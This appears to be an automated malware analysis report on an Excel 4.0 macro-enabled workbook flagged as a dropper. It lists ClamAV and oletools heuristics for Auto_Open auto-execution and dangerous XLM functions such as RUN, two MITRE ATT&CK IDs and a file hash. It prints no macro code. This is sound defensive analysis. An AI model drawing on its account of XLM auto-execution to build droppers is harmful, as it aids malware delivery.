MALICIOUS
Risk Score: 200
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file is an Excel 4.0 macro-enabled workbook that contains an Auto_Open macro. Heuristics indicate the use of dangerous functions like RUN, suggesting it is designed to execute a secondary payload. ClamAV detection further confirms its malicious nature as a dropper.
Heuristics 4
- ClamAV: Xls.Dropper.Agent-7819198-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Agent-7819198-0
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126190 bytes |

SHA-256: afbd12bef2bd65f133abd30b98bf1bda2ce830ab3a0e89b75b433f90831d7d17
Preview script: first 1,000 lines of the extracted script